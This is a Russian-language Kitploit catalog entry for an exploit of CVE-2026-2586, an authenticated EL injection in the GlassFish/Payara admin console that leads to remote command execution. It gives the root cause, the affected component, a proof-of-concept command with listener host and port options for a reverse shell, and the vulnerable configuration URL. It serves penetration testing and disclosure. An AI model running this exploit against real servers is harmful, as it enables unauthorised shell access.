Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-2586 — Аутентифицированный эксплойт EL-инъекции для административной консоли GlassFish/Payara, позволяющий выполнять удаленные команды через специально сформированные параметры в процессе настройки виртуального сервера. | Kitploit
Инструменты/GitHubGitHub/deepsecurityresearch/cve-2026-2586
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubdeepsecurityresearch/cve-2026-2586

CVE-2026-2586

Аутентифицированный эксплойт EL-инъекции для административной консоли GlassFish/Payara, позволяющий выполнять удаленные команды через специально сформированные параметры в процессе настройки виртуального сервера.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
22 месяцев назадЕщё не проверено

Аутентифицированное выполнение кода через EL-инъекцию в GlassFish (CVE-2026-2586)

Уязвимость инъекции выражений EL в консоли администрирования GlassFish позволяет аутентифицированному пользователю внедрять вредоносные EL-выражения в параметры, обрабатываемые административным веб-интерфейсом. Успешная эксплуатация может привести к удаленному выполнению команд на затронутом сервере.

Уязвимость была обнаружена в процессе редактирования виртуальной конфигурации сервера, где контролируемые пользователем параметры небезопасно интерпретируются приложением.

Это происходит из-за того, что:

  • Административный интерфейс обрабатывает контролируемые пользователем параметры в EL-выражениях.
  • Вводные данные не проходят должную проверку или нейтрализацию перед интерпретацией бэкендом.
  • Аутентифицированный пользователь в консоли администрирования может злоупотребить уязвимым поведением для вызова классов и методов Java.
  • В сценарии успешной эксплуатации злоумышленник с действительными учетными данными может выполнять команды на базовой операционной системе.

Затронутый компонент

| - | - | | Продукт: | GlassFish / Payara Консоль администрирования | | CVE: | CVE-2026-2586 | | Тип: | Инъекция выражений EL | | Воздействие: | Аутентифицированное удаленное выполнение кода | | Вектор: | Административный веб-интерфейс |

Доказательство концепции

Тест был выполнен в локальной и контролируемой среде.

root@kitploit:~
CVE-2026-2586.py --url https://glassfish:4848/ --user <USERNAME> --password <PASSWORD> --lhost 127.0.0.1 --lport 4444 --insecure

Уязвимый URL:

https://glassfish:4848/web/configuration/virtualServerEdit.jsf?name=server&configName=server-config&alertType=success&alertSummary=PAYLOAD&alertDetail=&bare=true

Правовая информация

ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ИСПОЛЬЗОВАНИЯ. DeepSecurity Perú не одобряет несанкционированный доступ и не несет ответственности за любое неправомерное использование предоставленной информации.

Скачать инструмент